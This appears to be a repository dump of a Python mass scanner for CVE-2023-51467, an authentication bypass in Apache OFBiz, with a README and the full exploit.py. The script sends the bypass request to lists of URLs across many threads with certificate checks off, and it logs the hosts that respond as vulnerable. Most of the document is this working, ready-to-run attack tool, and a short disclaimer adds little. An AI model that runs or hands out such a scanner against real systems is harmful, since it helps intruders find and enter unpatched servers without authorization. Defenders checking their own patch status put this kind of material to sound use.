├── requirements.txt ├── README.md └── exploit.py /requirements.txt: -------------------------------------------------------------------------------- 1 | alive_progress==3.1.4 2 | requests==2.25.1 3 | rich==13.7.0 4 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # CVE-2023-51467 Scanner 🕵️‍♂️ 2 | 3 | ## Description 📜 4 | 5 | CVE-2023-51467 Scanner is a Python-based command-line tool 🛠️ that scans URLs for a specific vulnerability in the Apache OfBiz ERP system. This zero-day security flaw, tracked as CVE-2023-51467, allows attackers to bypass authentication protections due to an incomplete patch for the critical vulnerability CVE-2023-49070. 6 | 7 | ## Vulnerability Details 🔐 8 | 9 | The CVE-2023-51467 vulnerability resides in the login functionality of Apache OfBiz versions prior to 18.12.10. It can be exploited by sending an HTTP request with empty or invalid USERNAME and PASSWORD parameters, which results in an authentication success message, allowing unauthorized access to internal resources. 10 | 11 | ## Installation 💻 12 | 13 | To use the CVE-2023-51467 Scanner, you need Python 3.x. 14 | 15 | You can install the required packages using `pip` 📦: 16 | 17 | ```shell 18 | pip install -r requirements.txt 19 | ``` 20 | 21 | ## Usage 🚀 22 | 23 | To scan a single URL 🎯: 24 | 25 | ```shell 26 | python exploit.py -u http://example.com 27 | ``` 28 | 29 | To scan a list of URLs from a file 📊: 30 | 31 | ```shell 32 | python exploit.py -f urls.txt -o output.txt -t 50 33 | ``` 34 | 35 | ## Options ⚙️ 36 | 37 | - `-u`, `--url`: Single URL to send the GET request to 🌐. 38 | - `-f`, `--file`: File containing a list of base URLs to scan 📄. 39 | - `-o`, `--output`: File to write vulnerable systems to (default is `output.txt`) 📝. 40 | - `-t`, `--threads`: Number of concurrent threads to use (default is 10) 🧵. 41 | 42 | ## Disclaimer ⚠️ 43 | 44 | This tool is intended for security research and should not be used for illegal activities. The authors of this tool cannot be held responsible for any misuse or damage from its use. -------------------------------------------------------------------------------- /exploit.py: -------------------------------------------------------------------------------- 1 | import os 2 | import argparse 3 | import requests 4 | import concurrent.futures 5 | 6 | from threading import Lock 7 | from rich.console import Console 8 | from typing import List, Optional 9 | from urllib.parse import urlparse 10 | from alive_progress import alive_bar 11 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 12 | 13 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 14 | console = Console() 15 | 16 | 17 | class CVE_2023_51467: 18 | def __init__(self, urls: List[str], threads: int, output_file: str): 19 | self.urls = urls 20 | self.threads = threads 21 | self.output_file = output_file 22 | self.file_lock = Lock() 23 | 24 | def check_url(self, base_url: str) -> Optional[str]: 25 | parsed_url = urlparse(base_url) 26 | schemes = ["http", "https"] if not parsed_url.scheme else [parsed_url.scheme] 27 | for scheme in schemes: 28 | url = f"{scheme}://{parsed_url.netloc}{parsed_url.path}" 29 | if self.is_url_accessible(url): 30 | return url 31 | return None 32 | 33 | def is_url_accessible(self, url: str) -> bool: 34 | try: 35 | response = requests.head(url, verify=False, timeout=5, allow_redirects=True) 36 | return response.status_code < 500 37 | except requests.RequestException: 38 | return False 39 | 40 | def scan_url(self, base_url: str): 41 | target_url = self.check_url(base_url) 42 | 43 | if target_url: 44 | try: 45 | response = requests.get( 46 | f"{target_url}/webtools/control/ping?USERNAME&PASSWORD=test&requirePasswordChange=Y", 47 | verify=False, 48 | timeout=10, 49 | allow_redirects=True, 50 | ) 51 | 52 | if response.status_code == 200 and "PONG" in response.text: 53 | console.log( 54 | f"Vulnerable URL found: {base_url}, Response: {response.text.strip()}" 55 | ) 56 | vulnerable_url = f"{urlparse(target_url).scheme}://{urlparse(target_url).netloc}\n" 57 | with self.file_lock: 58 | with open(self.output_file, "a") as file: 59 | file.write(vulnerable_url) 60 | except Exception as e: 61 | console.log(f"Error scanning {base_url}: {e}") 62 | 63 | def run(self): 64 | with alive_bar(len(self.urls), enrich_print=False) as bar: 65 | with concurrent.futures.ThreadPoolExecutor( 66 | max_workers=self.threads 67 | ) as executor: 68 | future_to_url = { 69 | executor.submit(self.scan_url, url): url for url in self.urls 70 | } 71 | for _ in concurrent.futures.as_completed(future_to_url): 72 | bar() 73 | 74 | 75 | def main(): 76 | script_name = os.path.basename(__file__) 77 | parser = argparse.ArgumentParser( 78 | description="CVE-2023-51467 Scanner: Scans URLs for a specific vulnerability associated with CVE-2023-51467.", 79 | epilog=f"Example usage:\n" 80 | f" python {script_name} -u http://example.com\n" 81 | f" python {script_name} -f urls.txt -o output.txt -t 50", 82 | formatter_class=argparse.RawDescriptionHelpFormatter, 83 | ) 84 | parser.add_argument("-u", "--url", help="Single URL to send GET request to") 85 | parser.add_argument( 86 | "-f", "--file", help="File containing list of base URLs to scan" 87 | ) 88 | parser.add_argument( 89 | "-o", 90 | "--output", 91 | default="output.txt", 92 | help="File to write vulnerable systems to", 93 | ) 94 | parser.add_argument( 95 | "-t", 96 | "--threads", 97 | type=int, 98 | default=10, 99 | help="Number of concurrent threads to use", 100 | ) 101 | args = parser.parse_args() 102 | 103 | urls = [] 104 | if args.file: 105 | with open(args.file, "r") as file: 106 | urls = [line.strip() for line in file] 107 | elif args.url: 108 | urls.append(args.url) 109 | else: 110 | console.log("No URL or file provided") 111 | return 112 | 113 | scanner = CVE_2023_51467(urls, args.threads, args.output) 114 | scanner.run() 115 | 116 | 117 | if __name__ == "__main__": 118 | main() 119 | --------------------------------------------------------------------------------